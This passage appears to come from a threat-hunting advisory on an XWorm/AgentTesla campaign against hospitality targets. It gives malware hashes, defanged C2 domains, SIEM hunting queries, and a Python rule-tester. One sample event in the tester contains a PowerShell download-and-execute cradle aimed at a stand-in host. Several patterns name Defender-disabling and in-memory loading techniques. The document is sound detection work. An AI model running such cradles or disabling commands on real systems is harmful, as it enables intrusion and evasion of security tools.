 * Exfiltration
   * T1041: Exfiltration Over C2 Channel




ANALYZED FILE HASHES

File Name – SHA256 (IoC)

 * Details for booking.docx – f3e6621928875a322ee7230ccf186bdaa5609118c4a6d1c2f4026adfb8e88744
 * Autorização do documento.docx – 9cd785dbcceced90590f87734b8a3dbc066a26bd90d4e4db9a480889731b6d29
 * Card & Booking Details.docx – 3c3e24c01a675b3b17bee9c8f560a33c3ecca8c44442fd5b3dd8c0f4429f279b
 * Passport and Id for booking details.docx – 6d86f36b2220e8d9580e6708856fa74f37f7aa35db1a708e17ecacf0de3d5d2e
 * 73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx – db1185f24c56cadec1c85a33b0efeb2d803ff00abf4c9df1e00d860683068415
 * 529f38_ab5ac880c56841bca4889e2e53082ddf.docx – 41c68aecada65a15f4a8bea52cc25033a1b73ff7340cd3865d55c61ded566e81
 * 73cceb_c6672ebf7c8e4edb9e3f2612ab056923.txt – 292b5a8c61eb79633590b6b13c0b41388ccad3535b55ed822b887d6d15d61be4
 * 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – 59d72ff91e94a2c762285cce3bcb3e94e8d14608c2eeecacdcd6fe720c3ad5f2
 * 73cceb_b2df5636b5c54a73b438fa5ae338326b.txt – 9419d7a578338a714f976fb2b9eb320049422ec7059cedcc4a8baf144c4df41b
 * 73cceb_e5c443158f5b446daab366060229bc37.txt – 2725a14da90a6bcbfde174df8b0e95179b617aa14ec07a2d1fc71000310ad913
 * 73cceb_69fbb28af79141d4b6bec17ff2cf1850.txt – 4746941996305743c9d0bcb96ed4b2b930355cd8782098aa5600b42131314308
 * 73cceb_33dedbe277af4ba48b81c1486becec3e.txt – c443d754153180ebeee1106d5eecf1024e063413f3f92a29c6c95a08c6f2e633
 * 73cceb_33dedbe277af4ba48b81c1486becec3e.txt – 1005feeff2ecfe6e53f53f63a2364de8418863d83e256322ca82e939dae95e45
 * 73cceb_a27333f1bf71425199c62379dc2c4fbf.txt – 6005529195e6afac29d8c62091ee7990e92b7a80b391b03c34c8a8fbf019fce6
 * 637c10a8-1401-4193-bede-dc80e432f3b6-dom.html – f0942afa08c509f58b4b9f02cae4581ebf712f2f1763f1a2ffb8f9d964e335ae
 * 529f38_03f0f1ffb57c407198e05107306a4f6f.txt – d4fdc73d563605cadf1ded9b644f21e8dae0f65870890357e5bc554bbc66bf74
 * 529f38_6521c5ccbd8d46acb81ce3eb5cc3cc56.txt – 1b5ec95836cd52efa853ba3fa76d0849e4094b32048952a7ac0676d34f251776
 * 529f38_41875cf4c8844415994858b3623063f9.txt – 1ae5589b6c358ff11a9555a7265ba5f0709be7a865e2cf51af04eb17b2a2ce18
 * 529f38_9ce24968dc7342deb680dad14f365bc5.txt – 1a517a25d55aae6af13d025b1d1edee7fb185b90155f30e195f58cbf4c6b36fe
 * 529f38_532d9fab787f45a9a533a9be38cab909.txt – d9a1c97646872be823bce7e37325f9869daa5593f3ced37024dc5188243639be
 * excelDNALibrary-AddIn64-packed.xll – 90cb95264d0b555fe9a760de404196ac183a958c9cc1aad0689598e35fbb0c3b
 * sssss.exe – 3c45a698e45b8dbb1df206dec08c8792087619e54c0c9fc0f064bd9a47a84f16
 * bin.dll – 4fc40af3b2e3f96e8013a7187e5cb4ce1a00a9528823f789cb8aca09c51143c6
 * 201871865 – 9a7061a539333e9f833a589197a60258ebb820bba5f1f29d5b31453e8e392d0f




SOME EXAMPLES OF RELEVANT SECURONIX DETECTION POLICIES

 * EDR-ALL-1038-RU
 * EDR-ALL-730-ER
 * EDR-ALL-30-ER
 * CEDR-ALL-30-ER
 * EDR-ALL-932-RU
 * WEL-ALL-1070-RU
 * EDR-ALL-979-RU
 * EDR-ALL-351-RU
 * WEL-ALL-1069-RU
 * EDR-ALL-1086-RU
 * EDR-ALL-1100-ER
 * EDR-ALL-1215-ERR
 * WEL-ALL-1186-ERR
 * EDR-ALL-1209-RU
 * PSH-ALL-231-RU
 * PSH-ALL-227-RU
 * PSH-ALL-314-RU


RELEVANT SPOTTER QUERIES

 * index = activity AND rg_functionality = “Endpoint Management Systems” AND
   (deviceaction = “Process Create” OR deviceaction = “Process Create (rule:
   ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =
   “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed
   Process”) AND (resourcecustomfield1 CONTAINS “Set-MpPreference” OR
   resourcecustomfield1 CONTAINS “Add-MpPreference”) AND (resourcecustomfield1
   CONTAINS “-DisableRealtimeMonitoring” OR resourcecustomfield1 CONTAINS
   “-DisableBehaviorMonitoring”)
 * index = activity AND rg_functionality = “Endpoint Management Systems” AND
   (deviceaction = “Process Create” OR deviceaction = “Process Create (rule:
   ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =
   “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed
   Process”) AND destinationprocessname = “schtasks.exe” AND
   (resourcecustomfield1 CONTAINS “\ProgramData\” OR resourcecustomfield1
   CONTAINS “\Users\” OR resourcecustomfield1 CONTAINS “\Public\” OR
   resourcecustomfield1 CONTAINS “\AppData\” OR resourcecustomfield1 CONTAINS
   “\Desktop\” OR resourcecustomfield1 CONTAINS “\Downloads\” OR
   resourcecustomfield1 CONTAINS “\Temp\” OR resourcecustomfield1 CONTAINS
   “\Tasks\” OR resourcecustomfield1 CONTAINS “\$Recycle”)
 * index = activity AND rg_functionality = “Endpoint Management Systems” AND
   (deviceaction = “Process Create” OR deviceaction = “Process Create (rule:
   ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =
   “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed
   Process”) AND (destinationprocessname = “reg.exe” OR destinationprocessname =
   “mshta.exe” OR destinationprocessname = “cscript.exe” OR
   destinationprocessname = “regsvr32.exe” OR destinationprocessname =
   “wscript.exe” OR destinationprocessname = “schtasks.exe”) AND
   (resourcecustomfield1 CONTAINS ” Invoke-” OR resourcecustomfield1 CONTAINS
   “FromBase64String” OR resourcecustomfield1 CONTAINS “New-Object” OR
   resourcecustomfield1 CONTAINS ” IEX(” OR resourcecustomfield1 CONTAINS “|IEX”
   OR resourcecustomfield1 CONTAINS ” bypass “)
 * index = activity AND rg_functionality = “Microsoft Windows Powershell” AND
   (message CONTAINS “}{0}” OR message CONTAINS “} {0}”) AND message CONTAINS ”
   -f” AND (message NOT CONTAINS
   “WarningWriteDownRecoveryPasswordInsertExternalKeyRestart” AND message NOT
   CONTAINS “ErrorSidProtectorRequiresAdditionalRecoveryProtector” AND message
   NOT CONTAINS “=\windows\sentinel\”)
 * index = activity AND rg_functionality = “Microsoft Windows Powershell” AND
   (message CONTAINS “System.Reflection.Assembly.Load($” OR message CONTAINS
   “[System.Reflection.Assembly]::Load($” OR message CONTAINS
   “[Reflection.Assembly]::Load($” OR message CONTAINS
   “System.Reflection.AssemblyName” OR message CONTAINS
   “Reflection.Emit.AssemblyBuilderAccess” OR message CONTAINS
   “Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS
   “Generated by= Microsoft Corporation” AND message NOT CONTAINS “Generated by:
   Microsoft Corporation”)
 * (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web
   Application Firewall” OR rg_functionality = “Web Proxy”) AND
   (destinationaddress = “193.149.185[.]229”)
 * index = activity AND rg_functionality = "Web Proxy"
   AND (requesturl CONTAINS "73cceb_" AND requesturl CONTAINS ".txt")
 * index = activity AND rg_functionality = "Web Proxy"
   AND (requesturl CONTAINS "powpowpowff.blogspot[.]com"
   OR requesturl CONTAINS "huskidkifklaoksikfkfijsju.blogspot[.]com"
   OR requesturl CONTAINS "backuphotelall.blogspot[.]com"
   OR requesturl CONTAINS "3000allfitheyito.blogspot[.]com"
   OR requesturl CONTAINS "urlintimacygoombguch.blogspot[.]com"
   OR requesturl CONTAINS "giv692dqvctosb3/50002023[.]txt"
   OR requesturl CONTAINS "port3000newspm.duckdns[.]org"
   OR requesturl CONTAINS "bakc5002.blogspot[.]com"
   OR requesturl CONTAINS "port5000duki.blogspot[.]com"
   OR requesturl CONTAINS "billielishhui.blogspot[.]com"
   OR requesturl CONTAINS "doccallingupdate.blogspot[.]com"
   OR requesturl CONTAINS "urlpropogationintimitacyi[.]blogspot.com")
 * index = activity AND rg_functionality = "Microsoft Windows Powershell"
   AND message CONTAINS "WinDefend" AND message CONTAINS "Stop-Service"
   AND message CONTAINS " -StartupType" AND message CONTAINS "Disabled"
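The hunting queries above are written for the Securonix query language, which makes it awkward to check their matching logic (especially the exclusion clauses) before they go into production. The following is an added example, not code from the advisory or from Securonix: each query is re-expressed as a plain Python predicate over an event dictionary whose field names mirror the queries (resourcecustomfield1 as the process command line, message as the PowerShell script block text, requesturl and destinationaddress for proxy and firewall events), and the rules are run over a handful of constructed sample events. It assumes CONTAINS behaves as a case-sensitive substring test; the sample events, the host names under host.invalid and the event ids are all made up for the example.

```python
"""Added example (not the advisory's or Securonix's own code): the hunting queries
above re-expressed as Python predicates and run over constructed sample events, so
the matching logic can be sanity-checked offline before a query is pasted into a SIEM.
Field names follow the queries: resourcecustomfield1 carries the process command line,
message the PowerShell script block text. Assumption: CONTAINS is treated as a
case-sensitive substring test; every sample event below is constructed."""

PS = "Microsoft Windows Powershell"
PROCESS_CREATE_ACTIONS = {"Process Create", "Process Create (rule: ProcessCreate)",
                          "ProcessRollup2", "Procstart", "Process", "Trace Executed Process"}
SCRIPT_HOSTS = {"reg.exe", "mshta.exe", "cscript.exe", "regsvr32.exe", "wscript.exe", "schtasks.exe"}
CRADLE_MARKERS = (" Invoke-", "FromBase64String", "New-Object", " IEX(", "|IEX", " bypass ")
FORMAT_EXCLUSIONS = ("WarningWriteDownRecoveryPasswordInsertExternalKeyRestart",
                     "ErrorSidProtectorRequiresAdditionalRecoveryProtector",
                     "=\\windows\\sentinel\\")
REFLECTION_MARKERS = ("System.Reflection.Assembly.Load($", "[System.Reflection.Assembly]::Load($",
                      "[Reflection.Assembly]::Load($", "System.Reflection.AssemblyName",
                      "Reflection.Emit.AssemblyBuilderAccess",
                      "Runtime.InteropServices.DllImportAttribute")
REFLECTION_EXCLUSIONS = ("Generated by= Microsoft Corporation", "Generated by: Microsoft Corporation")
NETWORK_SOURCES = {"Next Generation Firewall", "Web Application Firewall", "Web Proxy"}
# IOCs stay defanged exactly as the advisory prints them and are refanged once, here.
C2_IPS = {"193.149.185[.]229".replace("[.]", ".")}
URL_IOCS = tuple(ioc.replace("[.]", ".") for ioc in (
    "powpowpowff.blogspot[.]com", "huskidkifklaoksikfkfijsju.blogspot[.]com",
    "backuphotelall.blogspot[.]com", "3000allfitheyito.blogspot[.]com",
    "urlintimacygoombguch.blogspot[.]com", "giv692dqvctosb3/50002023[.]txt",
    "port3000newspm.duckdns[.]org", "bakc5002.blogspot[.]com", "port5000duki.blogspot[.]com",
    "billielishhui.blogspot[.]com", "doccallingupdate.blogspot[.]com",
    "urlpropogationintimitacyi[.]blogspot.com"))

def contains_any(text, needles):
    return any(n in text for n in needles)

def script_host_cradle(ev):
    """Script/LOLBin host spawned with a PowerShell download-and-execute cradle on its command line."""
    return (ev.get("deviceaction") in PROCESS_CREATE_ACTIONS
            and ev.get("destinationprocessname") in SCRIPT_HOSTS
            and contains_any(ev.get("resourcecustomfield1", ""), CRADLE_MARKERS))

def format_string_obfuscation(ev):
    """String reassembly via the -f format operator, minus BitLocker/Sentinel strings that use it legitimately."""
    msg = ev.get("message", "")
    return (ev.get("rg_functionality") == PS and ("}{0}" in msg or "} {0}" in msg)
            and " -f" in msg and not contains_any(msg, FORMAT_EXCLUSIONS))

def reflective_assembly_load(ev):
    """In-memory .NET assembly loading or P/Invoke declarations in a script block."""
    msg = ev.get("message", "")
    return (ev.get("rg_functionality") == PS and contains_any(msg, REFLECTION_MARKERS)
            and not contains_any(msg, REFLECTION_EXCLUSIONS))

def known_c2_address(ev):
    return ev.get("rg_functionality") in NETWORK_SOURCES and ev.get("destinationaddress") in C2_IPS

def staging_url(ev):
    url = ev.get("requesturl", "")
    return (ev.get("rg_functionality") == "Web Proxy"
            and (("73cceb_" in url and ".txt" in url) or contains_any(url, URL_IOCS)))

def defender_disabled(ev):
    """Stop-Service WinDefend together with setting its startup type to Disabled."""
    msg = ev.get("message", "")
    return ev.get("rg_functionality") == PS and all(
        s in msg for s in ("WinDefend", "Stop-Service", " -StartupType", "Disabled"))

RULES = (script_host_cradle, format_string_obfuscation, reflective_assembly_load,
         known_c2_address, staging_url, defender_disabled)

def evaluate(events):
    """Map each event id to the names of the rules that fired; events with no hit are omitted."""
    hits = {}
    for ev in events:
        fired = [rule.__name__ for rule in RULES if rule(ev)]
        if fired:
            hits[ev["id"]] = fired
    return hits

SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"id": 1, "deviceaction": "Process Create", "destinationprocessname": "mshta.exe",
     "resourcecustomfield1": "mshta.exe vbscript:Execute(\"powershell -w hidden -ep bypass "
                             "-c IEX(New-Object Net.WebClient).DownloadString('http://host.invalid/x.txt')\")"},
    {"id": 2, "rg_functionality": PS,
     "message": "$n = ('{1}{0}' -f 'ess', 'Proc'); [System.Reflection.Assembly]::Load($bytes)"},
    {"id": 3, "rg_functionality": PS,  # same -f pattern, but a known-benign BitLocker string
     "message": "$s = ('{1}{0}' -f 'x', 'WarningWriteDownRecoveryPasswordInsertExternalKeyRestart')"},
    {"id": 4, "rg_functionality": "Web Proxy", "requesturl": "https://bakc5002.blogspot.com/p/stage.html"},
    {"id": 5, "rg_functionality": "Next Generation Firewall", "destinationaddress": "193.149.185.229"},
    {"id": 6, "rg_functionality": PS,
     "message": "Stop-Service WinDefend -Force; Set-Service WinDefend -StartupType Disabled"},
    {"id": 7, "deviceaction": "Process Create", "destinationprocessname": "notepad.exe",
     "resourcecustomfield1": "notepad.exe C:\\notes.txt"},
]

if __name__ == "__main__":
    for event_id, fired in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(event_id, fired)
```

Event 3 is the one worth watching: it carries the same `'{1}{0}' -f` reassembly pattern as event 2 but also the BitLocker string the query excludes, so it produces no hit, which is exactly the false-positive suppression the NOT CONTAINS clauses are there for. If the leading spaces in markers such as " IEX(" or " bypass " are dropped when the query is transcribed, the cradle rule starts matching on substrings of ordinary words, so those spaces are not optional.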


REFERENCES:

 1. Elastic Security Labs: Attack chain leads to XWORM and AGENTTESLA
    https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla
 2. Securonix Threat Labs Initial Coverage Advisory: RCE 0-Day in MS Office (CVE-2022-30190)
    https://www.securonix.com/blog/rce-0-day-in-ms-office-using-ole-object-cve-2022-30190-analysis/
 3. Proofpoint: Reservations Requested: TA558 Targets Hospitality and Travel
    https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel
 4. enigma0x3: Bypassing AMSI via COM Server Hijacking
    https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
 5. Reddit: XWorm v3.1 Cracked
    https://www.reddit.com/r/blackhatrussia/comments/11jqko9/xworm_v31_cracked/
